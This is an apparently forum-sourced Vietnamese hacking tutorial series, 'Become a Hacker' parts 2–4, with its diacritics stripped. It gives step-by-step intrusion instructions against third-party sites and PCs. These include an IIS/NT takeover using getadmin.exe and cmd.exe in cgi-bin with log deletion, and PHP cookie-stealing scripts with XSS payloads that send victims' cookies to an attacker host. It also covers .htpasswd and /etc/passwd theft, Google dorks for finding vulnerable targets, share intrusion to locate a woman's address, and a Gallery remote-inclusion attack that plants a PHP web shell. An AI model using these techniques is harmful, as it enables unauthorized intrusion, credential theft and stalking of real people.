s lng tng i cc my ch cng ping m tng bng thng ln hn i phng. Ch : option t ca DOS khng gy ra lt ping, n ch ping mc tiu mt cch lin tc, vi nhng khong ngt qung gia hai ln ping lin tip. Trong tt c cc h Unix hoc Linux, bn c th dng ping -f gy ra lt thc s. Thc t l phi ping -f nu bn dng mt bn tng thch POSIX (POSIX Portable Operating System Interface da trn uniX), nu khng n s khng phi l mt bn Unix/Linux thc s, bi vy nu bn dng mt h iu hnh m n t cho n l Unix hay Linux, n s c tham s -f. ( Ti liu ca HVA v viethacker.net ) 19 . ) K thut xm nhp Window NT t mng Internet : _ y l bi hc hack u tin m ti thc hnh khi bt u nghin cu v hack , by gi ti s by li cho cc bn . bn s cn phI c mt s thI gian thc hin c n v n tuy d nhng kh . Ta s bt u : _ u tin bn cn tm mt server chy IIS : _ Tip n bn vo DOS v nh ` FTP `. VD : c:\Ftp www.dodgyinc.com ( trang na khi ti thc hnh th vn cn lm c , by gi khng bit h fix cha , nu bn no c trang no khc th hy post ln cho mI ngI cng lm nh ) Nu connect thnh cng , bn s thy mt s dng tng t nh th ny : CODE Connected to www.dodgyinc.com.

220 Vdodgy Microsoft FTP Service (Version 3.0). User (www.dodgyinc.com none)): Ci m ta thy trn c cha nhng thng tin rt quan trng , n cho ta bit tn Netbios ca my tnh l Vdodgy . T iu ny bn c th suy din ra tn m c s dng cho NT cho php ta c th khai thc , mc nh m dch v FTP gn cho n nu n cha i tn s l IUSR_VDODGY . Hy nh ly v n s c ch cho ta . Nhp anonymous trong user n s xut hin dng sau : CODE 331 Anonymous access allowed, send identity (e-mail name) as password. Password: By gi passwd s l bt c g m ta cha bit , tuy nhin , bn hy th nh vo passwd l anonymous . Nu n sai , bn hy log in lI thit b FTP , bn hy nh l khi ta quay lI ln ny th khng s dng cch mo danh na ( anonymous ) m s dng `Guest , th li passwd vi guest xem th no . By gi bn hy nh lnh trong DOS : CODE Cd /c V s nhn thy kt qu nu nh bn xm nhp thnh cng , by gi bn hy nhanh chng tm th mc `cgi-bin` . Nu nh bn may mn , bn s tm c d dng v thng thng h thng qun l t `cgi-bin` vo ni m ta va xm nhp cho cc ngI qun l h d dng iu khin mng hn . th mc cgi-bin c th cha cc chng trnh m bn c th li dng n chy t trnh duyt Web ca bn . Ta hy bt u quy no greenbiggrin.gif greenbiggrin.gif . _ u tin , bn hy chuyn t th mc cgi-bin v s dng lnh Binary ( c th cc bn khng cn dng lnh ny ) , sau bn dnh tip lnh put cmd.exe . Tip theo l bn cn c file hack ci vo th mc ny , hy tm trn mng ly 2 file quan trng nht l `getadmin.exe` v `gasys.dll` . Download chng xung , mt khi bn c n hy ci vo trong th mc cgi-bin . Ok , coi nh mI vic xong , bn hy ng ca s DOS . By gi bn hy nh a ch sau ln trnh duyt ca bn : http://www.dodgyinc.com/cgi-bin/getadmin.exe?IUSR_VDODGY Sau vi giy bn s c c cu tr li nh dI y : CODE CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: Congratulations , now account IUSR_VDODGY have administrator rights! Th l bn mo danh admin xm nhp h thng , vic cn thit by gi l bn hy t to cho mnh mt account , hy nh dng sau trn IE :

http://www.dodgyinc.com/cgi- bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%2 0hacker%20toilahacker%20/add dng lnh trn s to cho bn mt account login vi user : anhdenday v passwd : toilahackerBy gi bn hy l cho user ny c account ca admin , bn ch cn nh ln IE lnh : http://www.dodgyinc.com/cgi-bin/ge tadmin.exe?anhdenday Vy l xong ri , bn hy disconnect v n start menu > find ri search computer `www.dodgyinc.com`. Khi tm thy , bn vo explore , explore NT s m ra bn hay nhp user v passwd m n ( ca ti l user : anhdenday v passwd : toilahacker ) . C mt vn l khi bn xm nhp h thng ny th s b ghi li , do xo du vt bn hy vo `Winnt\system32\logfiles` m file log rI xo nhng thng tin lin quan n bn , rI save chng . Nu bn mun ly mt thng bo g v vic chia s s xm nhp th bn hy thay i ngy thng trn my tnh vI URL sau : http://www.dodgyinc.com/cgi-bin/cm d.exe?/c%20date%2030/04/03 xong rI bn hy xo file `getadmin.exe`, v `gasys.dll` t `cgi-bin` . Mc ch khi ta xm nhp h thng ny l chm pass ca admin ln sau xm nhp mt cch hp l , do bn hy tm file SAM ( cha pass ca admin v member ) trong h thng rI dng chng trnh l0pht crack crack pass ( Hng dn v cch s dng l0pht crack v 3.02 ti post ln ri ,cc bn hy t nghin cu nh ) . y l link : http://vnhacker.org/forum/?act=ST& f=6&t=11566&s= Khi crack xong cc bn c user v pass ca admin rI , by gi hy xo account ca user ( ca ti l anhdenday ) i cho an ton . Bn c th lm g trong h thng l tu thch , nhng cc bn ng xo ht ti liu ca h nh , ti cho h lm . Bn cm thy th no , rc ri lm phi khng . Lc ti th hack cch ny , ti my m mt c 4 gi , nu nh bn quen th ln th 2 bn s mt t thI gian hn . phn 3 ti s cp n HH Linux , n cch ngt mt khu bo v ca mt Web site , v lm th no hack mt trang web n gin nht .v.v

/////////////////

Become a Hacker 3
Nhng hiu bit c bn nht tr thnh Hacker Phn 3 20 . ) Cookie l g ? _ Cookie l nhng phn d liu nh c cu trc c chia s gia web site v browser ca ngi dng. cookies c lu tr di nhng file d liu nh dng text (size di 4k). Chng c cc site to ra lu tr/truy tm/nhn bit cc thng tin v ngi dng gh thm site

v nhng vng m h i qua trong site. Nhng thng tin ny c th bao gm tn/nh danh ngi dng, mt khu, s thch, thi quenCookie c browser ca ngi dng chp nhn lu trn a cng ca my mnh, ko phi browser no cng h tr cookie. Sau mt ln truy cp vo site, nhng thng tin v ngi dng c lu tr trong cookie. nhng ln truy cp sau n site , web site c th dng li nhng thng tin trong cookie (nh thng tin lin quan n vic ng nhp vo 1 forum) m ngi ko phi lm li thao tc ng nhp hay phi nhp li cc thng tin khc. Vn t ra l c nhiu site qun l vic dng li cc thng tin lu trong cookie ko chnh xc, kim tra ko y hoc m ho cc thng tin trong cookie cn s h gip cho hacker khai thc vt qua cnh ca ng nhp, ot quyn iu khin site . _ Cookies thng c cc thnh phn sau : + Tn: do ngi lp trnh web site chn + Domain: l tn min t server m cookie c to v gi i + ng dn: thng tin v ng dn web site m bn ang xem + Ngy ht hn: l thi im m cookie ht hiu lc . + Bo mt: Nu gi tr ny c thit lp bn trong cookie, thng tin s c m ho trong qu trnh truyn gia server v browser. + Cc gi tr khc: l nhng d liu c trng c web server lu tr nhn dng v sau cc gi tr ny ko cha cc khong trng, du chm, phy v b gii hn trong khong 4k. ( Ti liu ca Viethacker.net ) 21 . ) K thut ly cp cookie ca nn nhn : _ Trc ht , cc bn hy m notepad ri chp on m sau vo notepad : CODE <?php define (LINE, \r\n); define (HTML_LINE, ); function getvars($arr, $title) { $res = ; $len = count($arr); if ($len > 0) { if (strlen($title) > 0) { print([--------$title--------] . HTML_LINE); $res .= [--------$title--------] . LINE; } foreach ($arr as $key = > $value) { print([$key] . HTML_LINE);

print($arr[$key] . HTML_LINE); $res .= [$key] . LINE . $arr[$key] . LINE; } } return $res; } // get current date $now = date(Y-m-d H:i:s); // init $myData = [-----$now-----] . LINE; // get $myData .= getvars($HTTP_GET_VARS, ); // file $file = $REMOTE_ADDR . .txt; $mode = r+; if (!file_exists($file)) $mode = w+; $fp = fopen ($file, $mode); fseek($fp, 0, SEEK_END); fwrite($fp, $myData); fclose($fp); ?> hoc CODE <?php if ($contents && $header){ mail(victim@yahoo.com , from mail script,$contents,$header) or die(`couldnt email it`); sleep(2); ?> <script language=javascript > <?php } else { echo nope; } (Bn hy sa ci victim@yahoo.com thnh a ch Mail ca bn ) . Bn hy save ci notepad ny vi tn < tn tu cc bn > .php ( Nh l phi c .php ) ri upload ln mt host no c h tr PHP , trong VD ca ti l abc.php .( i vi cc bn tng lm Web chc s rt d phI khng ? ) . on m ny s c nhim v n cp thng tin (v c khi c c cookie ) ca nn nhn khi h m d liu c cha on m ny rI t ng save thng tin thnh file < ip ca nn nhn > .txt .

_ Cn mt cch na ly cookie c s dng trn cc forum b li nhng cha fix , khi post bi bn chi cn thm on m sau vo bi ca mnh : CODE document.write(` `) vi host_php : l a ch bn upload file n cp cookie ln . v abc.php l file VD ca ti . _ V d : khi p dng trong tag img, ta dng nh sau: CODE `)\> hoc: [CODE img]javascript: Document.write(`&#x3cimg src=http://host_php/docs.php? docs=`+escape(document .cookie)+`&#x3e`)\> _ Bn c th tm nhng trang web thc hnh th cch trong VD ny bng cch vo google.com tm nhng forum b li ny bng t kho Powered by .. forum vi nhng forum sau : ikonboard, Ultimate Bulletin Board , vBulletin Board, Snitz . Nu cc bn may mn cc bn c th tm thy nhng forum cha fix li ny m thc hnh , ai tm c th chia s vi mi ngi nh . _ Cn nhiu on m n cp cookie cng hay lm , cc bn hy t mnh tm thm . 22 . ) Cch ngt mt khu bo v Website : _ Khi cc bn ti tm kim thng tin trn mt trang Web no , c mt s ch trn trang Web khi bn vo s b chn li v s xut hin mt box yu cu nhp mt khu , y chnh l khu vc ring t ct du nhng thng tin mt ch dnh cho s ngi hoc mt nhm ngi no ( Ni ct ngh hack ca viethacker.net m bo e-chip ni ti chng hn ) . Khi ta click vo ci link th ( thng thng ) n s gi ti .htpasswd v .htaccess nm cng trong th mc bo v trang Web . Ti sao phi dng du chm trc trong tn file `.htaccess`? Cc file c tn bt u l mt du chm `.` s c cc web servers xem nh l cc file cu hnh. Cc file ny s b n i (hidden) khi bn xem qua th mc c bo v bng file .htaccess .Hai h s ny c nhim v iu khin s truy nhp ti ci link an ton m bn mun xm nhp . Mt ci qun l mt khu v user name , mt ci qun l cng vic m ho nhng thng tin cho file kia . Khi bn nhp ng c 2 th ci link mi m ra . Bn hy nhn VD sau : CODE Graham:F#.DG*m38d%RF Webmaster:GJA54j.3g9#$@f Username bn c th c c ri , cn ci pass bn nhn c hiu m t g khng ? D nhin l khng ri . bn c hiu v sao khng m bn khng th c c chng khng ? ci ny n c

s can thip ca thng file .htaccess . Do khi cng trong cng th mc chng c tc ng qua li bo v ln nhau nn chng ta cng khng di g m c gng t nhp ri ***** m mt khu cht tit ( khi cha c ngh ***** mt khu trong tay . Ti cng ang nghin cu c th xm nhp trc tip , nu thnh cng ti s post ln cho cc bn ) . Li l y , chuyn g s xy ra nu ci .htpasswd nm ngoi th mc bo v c file .htaccess ? Ta s chm c n d dng , bn hy xem link VD sau : http://www.company.com/cgi-bin/pro tected/ hy kim tra xem file .htpasswd c c bo v bI .htaccess hay khng , ta nhp URL sau : http://www.company.com/cgi-bin/pro tected/.htpasswd Nu bn thy c cu tr lI `File not found` hoc tng t th chc chn file ny khng c bo v , bn hy tm ra n bng mt trong cc URL sau : http://www.company.com/.htpasswd http://www.company.com/cgi-bin/.ht passwd http://www.company.com/cgi-bin/pas swords/.htpasswd http://www.company.com/cgi-bin/pas swd/.htpasswd nu vn khng thy th cc bn hy c tm bng cc URL khc tng t ( c th n nm ngay th mc gc y ) , cho n khi no cc bn tm thy th thi nh . Khi tm thy file ny ri , bn hy dng chng trnh John the ripper hoc Crackerjack, ***** passwd ct trong . Cng vic tip theo hn cc bn bit l mnh phi lm g rI , ly user name v passwd hp l t nhp vo ri xem th my c cu tm s nhng g trong , nhng cc bn cng ng c i pass ca h hay quy h nh . Cch ny cc bn cng c th p dng ly pass ca admin v hu ht nhng thnh vin trong nhm kn u l c chc c quyn c . 23 . ) Tm hiu v CGI ? _ CGI l t vit tt ca Common Gateway Interface , a s cc Website u ang s dng chng trnh CGI ( c gI l CGI script ) thc hin nhng cng vic cn thit 24 gi hng ngy . Nhng nguyn bn CGI script thc cht l nhng chng trnh c vit v c upload ln trang Web vI nhng ngn ng ch yu l Perl , C , C++ , Vbscript trong Perl c a chung nht v s d dng trong vic vit chng trnh ,chim mt dung lng t v nht l n c th chy lin tc trong 24 gi trong ngy . _ Thng thng , CGI script c ct trong th mc /cgi-bin/ trn trang Web nh VD sau : http://www.company.com/cgi-bin/log in.cgi vi nhng cng vic c th nh : + To ra chng trnh m s ngi gh thm . + Cho php nhng ngI khch lm nhng g v khng th lm nhng g trn Website ca bn .

+ Qun l user name v passwd ca thnh vin . + Cung cp dch v Mail . + Cung cp nhng trang lin kt v thc hin tin nhn qua li gia cc thnh vin . + Cung cp nhng thng bo li chi tit .v.v.. 24 . ) Cch hack Web c bn nht thng qua CGI script : _ Li th 1 : li nph-test-cgi + nh tn trang Web b li vo trong trnh duyt ca bn . + nh dng sau vo cuI cng : /cgi-bin/nph-test-cgi + Lc trn URL bn s nhn ging nh th ny : http://www.servername.com/cgi-bin/ nph-test-cgi + Nu thnh cng bn s thy cc th mc c ct bn trong . xem th mc no bn nh tip : CODE ? /* + file cha passwd thng c ct trong th mc /etc , bn hy nh trn URL dng sau : http://www.servername.com/cgi-bin/ nph-test-cgi?/etc/* _ Li th 2 : li php.cgi + Tng t trn bn ch cn nh trn URL dng sau ly pass : http://www.servername.com/cgi-bin/ php.cgi?/etc/passwd Quan trng l y l nhng li c nn vic tm cc trang Web cc bn thc hnh rt kh , cc bn hy vo trang google.com ri nh t kho : /cgi-bin/php.cgi?/etc/passwd] hoc cgi-bin/nph-test-cgi?/etc sau cc bn hy tm trn xem th trang no cha fix li thc hnh nh . 25 . ) K thut xm nhp my tnh ang online : _ Xm nhp my tnh ang online l mt k thut va d lI va kh . Bn c th ni d khi bn s dng cng c ENT 3 nhng bn s gp vn khi dng n l tc s dng trn my ca nn nhn s b chm i mt cch ng k v nhng my h khng share th khng th xm nhp c, do nu h tt my l mnh s b cng cc khi cha kp chm account , c mt cch m thm hn , t lm gim tc hn v c th xm nhp khi nn nhn khng share l dng chng trnh DOS tn cng . Ok , ta s bt u :

_ Dng chng trnh scan IP nh ENT 3 scan IP mc tiu . _ Vo Start == > Run g lnh cmd . _ Trong ca s DOS hy nh lnh net view CODE + VD : c:\net view 203.162.30.xx _ Bn hy nhn kt qu , nu n c share th d qu , bn ch cn nh tip lnh net use < a bt k trn my ca bn > : < share ca nn nhn > + VD : c:\net use E : 203.162.30.xxC _ Nu khi kt ni my nn nhn m c yu cu s dng Passwd th bn hy download chng trnh d passwd v s dng ( theo ti bn hy load chng trnh pqwak2 p dng cho vic d passwd trn my s dng HH Win98 hoc Winme v chng trnh xIntruder dng cho Win NT ) . Ch l v cch s dng th hai chng trnh tng t nhau , dng u ta nh IP ca nn nhn , dng th hai ta nh tn a share ca nn nhn nhng i vi xIntruder ta ch chnh Delay ca n cho hp l , trong mng LAN th Delay ca n l 100 cn trong mng Internet l trn dI 5000 . _ Nu my ca nn nhn khng c share th ta nh lnh : net use < a bt k trn my ca bn > : c$ (hoc d$)administrator + VD : net use E : 203.162.30.xxC$administrator Kiu chia s bng c$ l mc nh i vi tt c cc my USER l administrator . _ Chng ta c th p dng cch ny t nhp vo my ca c bn m mnh thm thng trm nh tm nhng d liu lin quan n a ch ca c nng ( vi iu kin l c ta ang dng my nh v bn may mn khi tm c a ch ) . Bn ch cn chat Y!Mass ri vo DOS nh lnh : c:\netstat n Khi dng cch ny bn hy tt ht cc ca s khc ch khung chat Y!Mass vi c ta thi , n s gip bn d dng hn trong vic xc nh a ch IP ca c ta . Sau bn dng cch xm nhp m ti ni trn .( C l anh chng tykhung ca chng ta hi xa khi tn tnh c bn xa qua mng cng dng cch ny t nhp v tm hiu a ch ca c ta y m , hi`hi` . ) Bn s thnh cng nu my ca nn nhn khng ci firewall hay proxy . ================================================== = = Nhiu bn c yu cu ti a ra a ch chnh xc cho cc bn thc tp , nhng ti khng th a ra c v rt kinh nghim nhng bi hng dn c a ch chnh xc , khi cc bn thc hnh xong ot c quyn admin c bn xo ci database ca h . Nh vy HVA s mang ting l ni bt ngun cho s ph hoi trn mng . mong cc bn thng cm , nu c th th ti

ch nu nhng cch thc cc bn tm nhng da ch b li ch khng a ra a ch c th no . ================================================== = = phn 4 ti s cp n k thut chng xm nhp vo my tnh ca mnh khi bn online , tm hiu s cc bc khi ta quyt nh hack mt trang Web , k thut tm ra li trang Web thc hnh , k thut hack Web thng qua li Gallery.v.v. GOOKLUCK!!!!!!!!!

//////////////////////////

Become a Hacker 4
Nhng hiu bit c bn nht tr thnh Hacker Phn 4 26 . ) Tm hiu v RPC (Remote Procedure Call) : _ Windows NT cung cp kh nng s dng RPC thc thi cc ng dng phn tn . Microsoft RPC bao gm cc th vin v cc dch v cho php cc ng dng phn tn hot ng c trong mi trng Windows NT. Cc ng dng phn tn chnh bao gm nhiu tin trnh thc thi vi nhim v xc nh no . Cc tin trnh ny c th chy trn mt hay nhiu my tnh. _Microsoft RPC s dng name service provider nh v Servers trn mng. Microsoft RPC name service provider phi i lin vi Microsoft RPC name service interface (NIS). NIS bao bao gm cc hm API cho php truy cp nhiu thc th trong cng mt name service database (name service database cha cc thc th, nhm cc thc th, lch s cc thc th trn Server). Khi ci t Windows NT, Microsoft Locator t ng c chn nh l name service provider. N l name service provider ti u nht trn mi trng mng Windows NT. 27 . ) K thut n gin chng li s xm nhp tri php khi ang online thng qua RPC (Remote Procedure Call) : _ Nu bn nghi ng my ca mnh ang c ngi xm nhp hoc b admin remote desktop theo di , bn ch cn tt chc nng remote procedure call th hin ti khng c chng trnh no c th remote desktop theo di bn c . N cn chng c hu ht tools xm nhp vo my ( v a s cc tools vit connect da trn remote procedure call ( over tcp/ip )).Cc trojan a s cng da vo giao thc ny. Cch tt: Bn vo service /remote procedure call( click chut phi ) chn starup typt/disable hoc manual/ apply. y l cch chng rt hu hiu vi my PC , nu thm vi cch tt file sharing th rt kh b hack ) ,nhng trong mng LAN bn cng phin phc vi n khng t v bn s khng chy c cc chng trnh c lin quan n thit b ny . Ty theo cch thc bn lm vic m bn

c cch chn la cho hp l . Theo ti th nu dng trong mng LAN bn hy ci mt firewall l chc chn tng i an ton ri . ( Da theo bi vit ca huynh i nh c khoai khoaimi admin ca HVA ) 28 . ) Nhng bc hack mt trang web hin nay : _ Theo lit k ca sch Hacking Exposed 3 th hack mt trang Web thng thng ta thc hin nhng bc sau : + FootPrinting : ( In du chn ) y l cch m hacker lm khi mun ly mt lng thng tin ti a v my ch/doanh nghip/ngi dng. N bao gm chi tit v a ch IP, Whois, DNS ..v.v i khi l nhng thong tin chnh thc c lien quan n mc tiu. Nhiu khi n gin hacker ch cn s dng cc cng c tm kim trn mng tm nhng thong tin . + Scanning : ( Qut thm d ) Khi c nhng thng tin ri, th tip n l nh gi v nh danh nhng nhng dch v m mc tiu c. Vic ny bao gm qut cng, xc nh h iu hnh, .v.v.. Cc cng c c s dng y nh nmap, WS pingPro, siphon, fscam v cn nhiu cng c khc na. + Enumeration : ( lit k tm l hng ) Bc th ba l tm kim nhng ti nguyn c bo v km, hoch ti khon ngi dng m c th s dng xm nhp. N bao gm cc mt khu mc nh, cc script v dch v mc nh. Rt nhiu ngi qun tr mng khng bit n hoc khng sa i li cc gi tr ny. + Gaining Access: ( Tm cch xm nhp ) By gi k xm nhp s tm cch truy cp vo mng bng nhng thng tin c c ba bc trn. Phng php c s dng y c th l tn cng vo li trn b m, ly v gii m file password, hay th thin nht l brute force (kim tra tt c cc trng hp) password. Cc cng c thng c s dng bc ny l NAT, podium, hoc L0pht. + Escalating Privileges : ( Leo thang c quyn ) V d trong trng hp hacker xm nhp c vo mng vi ti khon guest, th h s tm cch kim sot ton b h thng. Hacker s tm cch ***** password ca admin, hoc s dng l hng leo thang c quyn. John v Riper l hai chng trnh crack password rt hay c s dng. + Pilfering : ( Dng khi cc file cha pass b s h ) Thm mt ln na cc my tm kim li c s dng tm cc phng php truy cp vo mng. Nhng file text cha password hay cc c ch khng an ton khc c th l mi ngon cho hacker. + Covering Tracks : ( Xo du vt ) Sau khi c nhng thng tin cn thit, hacker tm cch xo du vt, xo cc file log ca h iu hnh lm cho ngi qun l khng nhn ra h thng b xm nhp hoc c bit cng khng tm ra k xm nhp l ai. + Creating Back Doors : ( To ca sau chun b cho ln xm nhp tip theo c d dng hn ) Hacker li Back Doors, tc l mt c ch cho php hacker truy nhp tr li bng con ng b mt khng phi tn nhiu cng sc, bng vic ci t Trojan hay to user mi (i vi t chc c nhiu user). Cng c y l cc loi Trojan, keylog + Denial of Service (DoS) : ( Tn cng kiu t chi dch v ) Nu khng thnh cng trong vic xm nhp, th DoS l phng tin cui cng tn cng h

thng. Nu h thng khng c cu hnh ng cch, n s b ph v v cho php hacker truy cp. Hoc trong trng hp khc th DoS s lm cho h thng khng hot ng c na. Cc cng c hay c s dng tn cng DoS l trin00, Pong Of Death, teardrop, cc loi nuker, flooder . Cch ny rt li hi , v vn cn s dng ph bin hin nay . _ Tu theo hiu bit v trnh ca mnh m mt hacker b qua bc no . Khng nht thit phI lm theo tun t . Cc bn hy nh n cu bit ngi bit ta trm trn trm thng . ( Ti liu ca HVA v hackervn.net ) 29 . ) Cch tm cc Website b li : _ Chc cc bn bit n cc trang Web chuyn dng tm kim thng tin trn mng ch ? Nhng cc bn chc cng khng ng l ta c th dng nhng trang tm nhng trang Web b li ( Ti vn thng dng trang google.com v khuyn cc bn cng nn dng trang ny v n rt mnh v hiu qu ) . _ Cc bn quan tm n li trang Web v mun tm chng bn ch cn vo google.com v nh on li vo sau allinurl : . VD ta c on m li trang Web sau : cgi-bin/php.cgi?/etc/passwd cc bn s nh : allinurl:cgi-bin/php.cgi?/etc/passwd N s lit k ra nhng trang Web ang b li ny cho cc bn , cc bn hy nhn xung di cng ca mi mu lit k ( dng a ch mu xanh l cy ) nu dng no vit y chang t kho mnh nhp vo th trang hoc ang b li .Cc bn c xm nhp vo c hay khng th cng cn tu vo trang Web fix li ny hay cha na . _ Cc bn quan tm n li forum , cc bn mun tm forum dng ny thc tp , ch cn nhp t kho powered by VD sau l tm forum dng Snitz 2000 : powered by Snitz 2000 _ Tuy nhin , vic tm ra ng forum hoc trang Web b li theo cch c xc sut khng cao , bn hy quan tm n on string c bit trong URL c trng cho tng kiu trang Web hoc forum ( ci ny rt quan trng , cc bn hy t mnh tm hiu thm nh ) . VD tm vi li Hosting Controller th ta s c on c trng sau /admin hay /advadmin hay /hosting ta hy nh t kho :

allinurl:/advadmin hoc allinurl:/admin hoc allinurl:/hosting N s lit k ra cc trang Web c URL dng : http://tentrangweb.com/advadmin hoc http://tentrangweb.com/admin hoc http://tentrangweb.com/hosting VD vi forum UBB c on c trng cgi-bin/ultimatebb.cgi? Ta cng tm tng t nh trn . Ch cn bn bit cch tm nh vy ri th sau ny ch cn theo di thng tin cp nht bn trang Li bo mt ca HVA do bn LeonHart post hng ngy cc bn s hiu c ngha ca chng v t mnh kim tra . 30 . ) K thut hack Web thng qua li Gallery ( mt dng ca li php code inject ): _ Gallery l mt cng c cho php to mt gallery nh trn web c vit bng PHP , li dng s h ny ta c th li dng vit thm vo mt m PHP cho php ta upload , chnh l mc ch chnh ca ta . _ Trc ht bn hy ng k mt host min ph , tt nht l bn ng k brinkster.com cho d . Sau bn m notepad v to file PHP vi on m sau : CODE <?php global $PHP_SELF; echo <form method=post action=$PHP_SELF?$QUERY_STRING > <input type=text name=shell size=40 > <input type=hidden name=act value=shell > <input type=submit value=Go name=sm > ; set_magic_quotes_runtime(1); if ($act == shell) { echo \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n < xmp > ; system($shell); echo \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n ; } echo ; ?>

on m ny bn hy to lm 2 file c tn khc nhau ( nhng cng chung mt m ) v t tn l : + shellphp.php : file ny dng chy shell trn victim host . + init.php : file ny dng upload ln trang c host bn va to . ( Bn hy upload file init.php ny ln sm v ta s cn s dng n nhng vi on m khc , bn qun upload file ny ln l tiu ) Bn hy to thm mt file PHP vi m sau : CODE <?php function handleupload() { if (is_uploaded_file($_FILES[`userfile`][`tmp_name`])) { $filename = $_FILES[`userfile`][`tmp_name`]; print $filename was uploaded successfuly; $realname = $_FILES[`userfile`][`name`]; print realname is $realname\n; print copying file to uploads dir .$realname; copy($_FILES[`userfile`][`tmp_name`],*PATH*.$realna me); // lu *PATH* chng ta s thay i sau } else { echo Possible file upload attack: filename.$_FILES[`userfile`][`name`]..; } } if ($act == upload) { handleupload(); } echo <form ENCTYPE=multipart/form-data method=post action=$PHP_SELF? $QUERY_STRING > File:<INPUT TYPE=FILE NAME=userfile SIZE=35 > <input type=hidden name=MAX_FILE_SIZE value=1000000 > <input type=hidden name=act value=upload > <input type=submit value=Upload name=sm > ; ?> Bn hy t tn l upload.php , n s dng upload ln trang Web ca nn nhn . _ Tip theo Bn vo Google, g Powered by gallery ri enter, Google s lit k mt ng nhng site s dng Gallery , bn hy chn ly mt trang bt k rI dng link sau th xem n cn mc lI Gallery hay khng : http:// trang Web ca nn nhn > /gallery./captionator.php?GALLERY_BASEDIR=http://ww wxx.brinkster.com/ /

Nu bn thy hin ln mt hnh ch nht pha trn cng , bn phi ca n l lnh chuyn tip c ch Go l coi nh bn tm thy c I tng ri . By gi bn c th g lnh thng qua ch nht hack Web ca nn nhn . Trc ht bn hy g lnh pwd xc nh ng dn tuyt i n th mc hin thi ri nhn nt Go , khi n cho kt qu bn hy nhanh chng ghi li ng dn pha dI ( Ti s s dng VD ng dn ti tm thy l /home/abc/xyz/gallery ). Sau bn nh tip lnh |s a| lit k cc th mc con ca n . By gi bn hy nhn kt qu , bn s thy mt ng cc th mc con m ta lit k . Bn hy lun nh l mc ch ca chng ta l tm mt th mc c th dng upload file upload.php m ta chun b t trc do bn hy xc nh cng ti bng cch nhn vo nhng ch cuI cng ca mi hng kt qu : + Bn hy loi b trng hp cc th mc m c du . hoc .. v y l th mc gc hoc l th mc o ( N thng c xp trn cng ca cc hng kt qu ) . + Bn cng loI b nhng hng c ch cui cng c gn ui ( VD nh config.php , check.inc .v.v ) v y l nhng file ch khng phi l th mc . + Cn li l nhng th mc c th upload nhng ti khuyn bn nn chn nhng hng cha tn th mc m c cha s ln hn 1 ( Bn c th xc nh c chng bng cch nhn ct th 2 t tri sang ) , v nh vy va chc chn y l th mc khng phi th mc o , va lm cho admin ca trang Web kh pht hin khi ta ci file ca ta vo . Ti VD ti pht hin ra th mc loveyou c cha 12 file c th cho ta upload , nh vy ng dn chnh thc m ta upload ln s l : /home/abc/xyz/Gallery/loveyou By gi bn hy vo account host ca bn, sa ni dung file init.php ging nh m ca file upload.php, nhng sa li *PATH* thnh /home/abc/xyz/gallery/loveyou/ . ng thi cng chun b mt file upload.php trn my ca bn vi *PATH* l ( 2 du ngoc kp ). By gi l ta c th upload file upload.php ln trang Web ca nn nhn c ri , bn hy nhp a ch sau trn trnh duyt Web ca bn : http:// trang Web ca nn nhn > /gallery./captionator.php?GALLERY_BASEDIR=http://ww wxx.brinkster.com/ / Bn s thy xut hin tip mt khung hnh ch nht v bn cnh l c 2 nt lnh , mt l nt brown , mt l nt upload . Nt brown bn dng dn n a ch file upload.php bn chun b trn my ca bn , nt upload khi bn nhn vo th n s upload file upload.php ln trang Web ca nn nhn . Ok , by gi coi nh bn hon thnh chng ng hack Web ri . T by gi bn hy vn dng tn cng i th nh ly database , password ( lm tng t nh cc bi hng dn hack trc ) , nhng cc bn ch nn thc tp ch ng xo database hay ph Web ca h. Nu l mt hacker chn chnh cc bn ch cn upload ln trang Web dng ch : Hack by .. l ri . Cng nh nhng ln trc , cc bn c thnh cng hay khng cng tu thuc vo s may mn v kin tr nghin cu vn dng kin thc ca cc bn . ( Da theo hng dn hack ca huynh vnofear viethacker.net ) GOODLUCK!!!!!!!!!!!!